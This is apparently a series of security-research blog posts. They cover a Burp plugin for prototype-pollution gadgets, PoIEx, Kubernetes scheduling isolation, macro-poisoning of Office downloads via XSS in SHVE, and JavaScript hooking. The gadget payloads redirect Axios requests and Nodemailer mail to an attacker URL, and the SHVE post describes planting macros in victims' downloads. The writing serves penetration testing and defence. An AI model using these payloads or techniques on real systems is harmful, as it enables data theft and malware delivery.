Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.
On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burpsuite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
"payload": {"<parameter>": "<URL>"},
"description": "<Description>",
"null_payload": {"<parameter>": {}}
}

Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

Vulnerable Code Example:

app.get("/get-api-key", async (req, res) => {
  try {
      const instance = axios.create({baseURL: "https://doyensec.com"});
      const response = await instance.get("/?api-key=<API_KEY>");
  }
});

Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

Gadget for Axios:

{
  "payload": {"baseURL": "https://<URL>"},
  "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
  "null_payload": {"baseURL": {}}
},
{
  "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
  "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
  "null_payload": {"proxy": {}}
}

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

Vulnerable Code Example:

transporter.sendMail(mailOptions, (error, info) => {
  if (error) {
      res.status(500).send('500!');
  } else {
      res.send('200 OK');
  }
});

Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

Gadget for Nodemailer:

{
  "payload": {"cc": "email@<URL>"},
  "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
  "null_payload": {"cc": {}}
},
{
  "payload": {"bcc": "email@<URL>"},
  "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
  "null_payload": {"bcc": {}}
}

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Introducing PoIEx - Points Of Intersection Explorer

2024-01-30T00:00:00+01:00

We are releasing a previously internal-only tool to improve Infrastructure as Code (IaC) analysis and enhance Visual Studio Code allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on Github.

Nowadays, cloud-oriented solutions are no longer a buzzword, cloud providers offer ever more intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure begin to play a critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud related technologies, focusing on the points where they meet is crucial to discover new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec we have solved this issue with PoiEx. The extension enhances VSCode with all the features required to efficiently perform code reviews, such as advanced collaboration capabilities, notes taking using the VS Code Comments API and integration with Semgrep, allowing it to be used also as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can place sticky notes to any code locations without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

👨‍💻 PoIEx as a standalone Semgrep extension for VSCode

PoIEx works also as a standalone VSCode extension for Semgrep. PoIEx allows the user to scan the entire workspace and presents Semgrep findings nicely in the VSCode “Problems” tab.

Moreover, by right-clicking the issue, it is possible to apply a flag and update its status as: ❌ false positive,🔥 Hot or ` ✅ resolved`. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to setup custom arguments for Semgrep. As an example we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local and each reviewer must share the same version.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user-input is used to instantiate the AWS SDK client. Without proper checks, the user could be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we are covering the issue identification in a code review, as soon as the codebase is opened and explored with PoIEx.

Once downloaded and opened in VS Code, examine the codebase for Lab 1, by using PoIEx to run Semgrep and show the infrastructure diagram by selecting the main.tf file. The result should be similar to the following one.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In that case we see that there is an S3 PoI in app/web.go:52. Once clicked, we are redirected at the GetListObjects function defined at web.go#L50. While it is just listing the files in an S3 bucket, both the SDK client config and bucket name are passed as parameters in its signature.

A quick search for its usages will show the vulnerable code

//*aws config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
//list of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If the aws_config.Credentials is set to nilbecause of a missing key/secret in the input, the credentials provider chain will be used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129 ) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master thesis at ETH Zurich under the mentoring of Francesco Lacerenza.

Check out PoIEx! Install the last release from GitHub and contribute with a star, bug reports or suggestions.

Kubernetes Scheduling And Secure Design

2024-01-23T00:00:00+01:00

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

nodeSelector field matching against node labels;
nodeName and namespace fields, basic and effective;
Affinity and anti-affinity, constraints type expansion for inclusion and repulsion;
Inter-pod affinity and anti-affinity, which focus labels matching on pods labels instead of nodes labels when dealing with inclusion and repulsion;
Taints and Tolerations, allowing a node to repel or tolerate a pod being scheduled;
pod topology spread constraints, based on regions, zones, nodes, and other user-defined topology domains;
Design a Custom Scheduler, tailored to your security needs

Mechanisms for Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorizations may lead to privileged pods sharing the node with pods having PII data mounted or a different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one operating by just specifying the target node labels inside the pod specification.

Example pod Spec

apiVersion: v1
kind: pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on pods respecting all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the Spec is set, the kube scheduler simply passes the pod to the kubelet, which then attempts to assign the pod to the specified node.

In that sense, nodeName overwrites other scheduling rules (e.g., nodeSelector,affinity, anti-affinity etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

The pod will not run if the node in the spec is not running or if it is out of resources to host it
Cloud environments like AWS’s EKS come with non predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De-facto such an approach invalidates all the computational efficiency benefits of the scheduler and it should be only applied on small groups of critical workloads easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the possibility to specify rules for pod scheduling based on some characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard): If it’s set as preferredDuringSchedulingIgnoredDuringExecution, this indicates a soft rule. The scheduler will try to adhere to this rule, but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging. If it’s set as requiredDuringSchedulingIgnoredDuringExecution, it’s a hard rule. The scheduler will not schedule the pod unless the condition is met. This can lead to a pod remaining unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either a p0 or p1 workloadtype (custom strategy).

Multiple operators are available and NotIn and DoesNotExist are the specific ones usable to obtain node anti-affinity. From a security standpoint, only hard rules requiring the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should be used for computational configurations that can not affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on, based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together. In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations. They can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods and they allow the scheduler to schedule pods with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each node also defines an action linked to each taint: NoExecute (affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules not based solely on labels and it does not leave flexibility.

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that the default scheduler might not know about. Writing a custom scheduler allows an organization to apply a risk-based scheduling to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

Watches for unscheduled pods
Implements a scheduling algorithm to decide on which node the pod should run
Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity and you might be better off just sticking with the default one if you are not already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker perspective. In specific cases, the implemented mechanisms could be used either to:

Attract critical pods - A compromised node or role able to edit the metadata could be abused to attract pods, which are interesting to the attacker, by manipulating the labels of a controlled node.
- Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
Avoid rejection on critical nodes - If users are supposed to submit pod specs or have indirect control over how they are dynamically structured, this could be abused with scheduling sections. An attacker able to submit pod Specs could use scheduling preferences to jump to a critical node.
- Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
- Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper with its own labels to trick the scheduler as described above.

A security measure could be applied with the NodeRestriction admission plugin. It basically denies labels editing from the kubelet if the node-restriction.kubernetes.io/ prefix is present in the label.

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, the design would not exploit the Kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

Isolate critical namespaces/workloads on their own node group
Reserve a node for critical pods of each namespace
Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

Different teams, different trust level
It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.
Data being processed or stored
Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with any workload with less hardened workloads may expose the data to a risk
Exposed network services on the same node
Any pod that exposes a network service increases its attack surface. pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.
pod privileges and capabilities, or its assigned risk
Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment are found, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the amount of workloads in each isolation group should be evaluable and ready to be addressed by mixing the scheduling strategies, according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Office Documents Poisoning in SHVE

2023-11-03T00:00:00+01:00

Hello, folks! We’re back with an exciting update on Session Hijacking Visual Exploitation (SHVE) that introduces an insidious twist to traditional exploitation techniques using Office documents. We all know how Office documents laced with macros have been a longstanding entry point for infiltrating systems. SHVE now takes a step further by leveraging XSS vulnerabilities and the inherent trust users have in websites they regularly visit.

Our newest feature integrates the concept of Office document poisoning. Here’s how it works: SHVE allows you to upload templates for .docm, .pptm, and .xslm formats. Whenever a victim of SHVE goes to download one of these document types, the tool will automatically intercept and inject the malicious macros into the file before it is downloaded. What makes this technique particularly sneaky is that the document appears completely normal to the user, maintaining the original content and layout. However, in the background, it executes the malicious payload, unbeknownst to the user.

This approach capitalizes on two critical aspects: the trust users have in documents they download from legitimate websites they visit, and the inherent dangers of macros embedded within Office documents. By combining these two elements, we create a subtle vector for delivering malicious payloads. It’s the wolf in sheep’s clothing, where everything looks as it should be, but the danger lurks within.

To provide a clear demonstration of this technique, we’ve prepared a video illustrating this Office document poisoning in action. Witness how a seemingly innocent download can turn into a nightmare for the end user.

Your browser does not support the video tag.

As security researchers and ethical hackers, we need to constantly evolve and adapt our methods. With this update, SHVE not only allows for the exploitation of XSS vulnerabilities but also cleverly abuses the trust mechanisms users have built around their daily digital interactions. This enhancement is not just a step forward in terms of technical capability, but also a reminder of the psychological aspects of security exploitation.

We’re eager to see how the community will leverage these new features in their penetration testing and red teaming engagements. As always, we welcome contributions, and we’re looking forward to your feedback and insights. Stay safe, and happy hacking!

Client-side JavaScript Instrumentation

2023-09-25T00:00:00+02:00

There is a ton of code that is not worth your time and brain power. Binary reverse engineers commonly skip straight to the important code by using ltrace, strace, or frida. You can do the same for client side JavaScript using only common browser features. This will save time, make testing more fun and help keep your attention span available for the code that deserves your focus.

This blog introduces my thinking processes and practical methods for instrumenting client side JavaScript. This processes have helped me to find deeply embedded bugs in complicated codebases with relative ease. I have been using many of these tricks for so long that I implemented them in a web extension called Eval Villain. While I will introduce you to some of Eval Villain’s brand new features, I will also show how to get the same results without Eval Villain.

General Method and Thinking

Testing an application often raises questions as to how the application works. The client must know the answers to some of these questions if the application is to function. Consider the following questions:

What parameters does the server accept?
How are parameters encoded/encrypted/serialized?
How does the wasm module affect the DOM?
Where are the DOM XSS sinks and what sanitization is being applied?
Where are the post message handlers?
How is cross-origin communication between ads being accomplished?

For the web page to work, it needs to know the answer to these questions. This means we can find our answers in the JavaScript too. Notice that each of these questions imply the use of particular JavaScript functions. For example, how would the client implement a post message handler without ever calling addEventListener? So “Step 1” is hooking these interesting functions, verifying the use case is what we are interested in and tracing back. In JavaScript, it would look like this:

(() => {
    const orig = window.addEventListener;
    window.addEventListener = function(a, b) {
        if (a === "message") {
            console.log("postMessage handler found");
            console.log(b); // You can click the output of this to go directly to the handler
            console.trace(); // Find where the handler was registered.
        }
        return orig(...arguments);
    }
})();

Just pasting the above code in the console will work if the handler has not already been registered. However, it is crucial to hook the function before it’s even used. In the next section I will show a simple and practical way to always win that race.

Hooking native JavaScript is “Step 1”. This often helps you find interesting code. Sometimes you will want to instrument that code but it’s non-native. This requires a different method that will be covered in the “Step 2” section.

Step 1: Hooking native JavaScript

Build your own Extension

While you can use one of many web extensions that will add arbitrary JavaScript to the page, I don’t recommend it. These extensions are often buggy, have race conditions and are difficult to develop in. In most cases, I find it easier to just write my own extension. Don’t be daunted, it is really easy. You only need two files and I already made them for you here.

To load the code in Firefox go to about:debugging#/runtime/this-firefox in the URL bar, click Load Temporary Add-on and navigate to the manifest.json file in the top directory of the extension.

For chrome, go to chrome://extensions/, enable developer mode in the right side and click load unpacked.

The extension should show up in the addon list, where you can quickly enable or disable it. When enabled, the script.js file will load in every web page. The following lines of code log all input to document.write.

	/*********************************************************
	 ***  Your code goes goes here to run in pages scope  ***
	 *********************************************************/

	// example code to dump all arguments to document.write
	document.write = new Proxy(document.write, {
		apply: function(_func, _doc, args) {
			console.group(`[**] document.write.apply arguments`);
				for (const arg of args) {
					console.dir(arg);
				}
			console.groupEnd();
			return Reflect.apply(...arguments);
		}
	});

Replace those lines of code with what ever you want. Your code will run in every page and frame before the page has the opportunity to run its own code.

How it works

The boiler plate uses the manifest file to register a content script. The manifest tells the browser that the content script should run in every frame and before the page loads. Content scripts do not have direct access to the scope of the page they are loaded into but they do have direct access to the DOM. So the boiler plate code just adds a new script into the pages DOM. A CSP can prohibit this, so the extension checks that it worked. If a CSP does block you, just disable the CSP with browser configs, a web extension or an intercepting proxy.

Notice that the instrumentation code ultimately ends up with the same privileges as the website. So your code will be subject to the same restrictions as the page. Such as the same origin policy.

Async and Races

A quick word of warning. The above content script will give you first access to the only JavaScript thread. The website itself can’t run any JavaScript until you give up that thread. Try it out, see if you can make a website that runs document.write before the boiler plate has it hooked.

First access is a huge advantage, you get to poison the environment that the website is about to use. Don’t give up your advantage until you are done poisoning. This means avoiding the use of async functions.

This is why many web extensions intended to inject user JavaScript into a page are buggy. Retrieving user configuration in a web extension is done using an async call. While the async is looking up the user config, the page is running its code and potentially has already executed the sink you wanted to hook. This is why Eval Villain is only available on Firefox. Firefox has a unique API that can register the content script with the user configuration.

Eval Villain

It is very rare that I run into a “Step 1” situation that can’t be solved with Eval Villain. Eval Villain is just a content script that hooks sinks and searches input for sources. You can configure almost any native JavaScript functionality to be a sink. Sources include user configure strings or regular expressions, URL parameters, local storage, cookies, URL fragment and window name. These sources are recursively decoded for important substrings. Let’s look at the same page of the example above, this time with Eval Villain in its default configuration.

Notice this page is being loaded from a local file://. The source code is seen below.

<script>
let x = (new URLSearchParams(location.search)).get('x');
x = atob(x);
x = atob(x);
x = JSON.parse(x);
x = x['a'];
x = decodeURI(x);
x = atob(x);
document.write(`Welcome Back ${x}!!!`);
</script>

Even though the page has no web requests, Eval Villain still successfully hooks the user configured sink document.write before the page uses it. There is no race condition.

Also notice that Eval Villain is not just displaying the input of document.write. It correctly highlighted the injection point. The URL parameter x contained an encoded string that hit the sink document.write. Eval Villain figured this out by recursively decoding the URL parameters. Since the parameter was decoded, a encoder function is provided to the user. You can right click, copy message and paste it into the console. Using the encoder function lets you quickly try payloads. Below shows the encoder function being used to inject a marquee tag into the page.

If you read the previous sections, you know how this all works. Eval Villain is just using a content script to inject its JavaScript into a page. Anything it does, you can do in your own content script. Additionally, you can now use Eval Villain’s source code as your boiler plate code and customize its features for your particular technical challenge.

Step 1.5: A Quick Tip

So lets say you used “Step 1” to get a console.trace from an interesting native function. Maybe a URL parameter hit your decodeURI sink and now your tracing back to the URL parsing function. There is a mistake I regularly make in this situation and I want you to do better. When you get a trace, don’t start reading code yet!

Modern web applications often have polyfills and other cruft at the top of the console.trace. For example, the stack trace I get on google search results page starts with functions iAa, ka, c, ng, getAll. Don’t get tunnel vision and start reading ka when getAll is obviously what you want. When you look at getAll, don’t read source! Continue to scan, notice that getAll is a method and it’s sibling are get, set, size, keys, entries and all the other methods listed in the URLSearchParams documentation. We just found multiple custom URL parsers, re-implemented in minified code without actually reading the code. “Scan” as much as you can, don’t start reading code deeply until you find the right spot or scanning has failed you.

Step 2: Hooking non-native code

Instrumenting native code didn’t result in vulnerabilities. Now you want to instrument the non-native implementation itself. Let me illustrate this with an example.

Let’s say you discovered a URL parser function that returns an object named url_params. This object has all the key value pairs for the URL parameters. We want to monitor access to that object. Doing so could give us a nice list of every URL parameter associated to a URL. We may discover new parameters this way and unlock hidden functionality in the site.

Doing this in JavaScript is not hard. In 16 lines of code we can have a well organized, unique list of URL parameters associated to the appropriate page and saved for easy access in localStorage. We just need to figure out how to paste our code right into the URL parser.

function parseURL() {
    // URL parsing code
    // url_params = {"key": "value", "q": "bar" ...

    // The code you want to add in
    url_params = new Proxy(url_params, {
        __testit: function(a) {
            const loc = 'my_secret_space';
            const urls = JSON.parse(localStorage[loc]||"{}");
            const href = location.protocol + '//' + location.host + location.pathname;
            const s = new Set(urls[href]);
            if (!s.has(a)) {
                urls[href] = Array.from(s.add(a));
                localStorage.setItem(loc, JSON.stringify(urls));
            }
        },
        get: function(a,b,c) {
            this.__testit(b);
            return Reflect.get(...arguments);
        }
    };
    // End of your code

    return url_params;
}

Chrome’s dev tools will let you type your own code into the JavaScript source but I don’t recommend it. At least for me, the added code will disappear on page load. Additionally, it is not easy to manage any instrumentation points this way.

